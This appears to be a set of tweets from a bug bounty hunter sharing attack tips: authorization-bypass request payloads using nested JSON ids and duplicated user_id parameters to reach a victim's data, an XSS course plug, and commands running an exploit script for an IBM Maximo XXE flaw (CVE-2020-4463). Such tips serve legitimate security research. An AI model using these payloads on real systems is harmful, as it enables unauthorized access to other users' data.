Professional bug bounty hunter.
Active researcher on bugcrowd with 100% accuracy with over 100 submissions.
Half of fame- Google,Oracle,Apple,Spotify,Microsoft
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
POST /api/get customers
Content-Type: application/json {“user_id”:<attacker_id>,”user_id”:<victim’s_id>}
GET /api_v1/messages?user_id=VICTIM_ID --> 401
GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK
XSS is one of the top vulns in bug bounties. Learning about it is important to get started. Heard good things about this course and @christophelimp is offering 40% off:
https://t.co/bmcm14P4Tb - Check it out guys!
IBM Maximo Asset Management is vulnerable to Information Disclosure via XXE Vulnerability (CVE-2020-4463)
1. Data Leakage
python3 https://t.co/abCIVJtoOC --url https://10.0.0.1 -d
2. XXE
python3 https://t.co/abCIVJtoOC --url https://10.0.0.1 -x
https://t.co/kcBlZmTIZw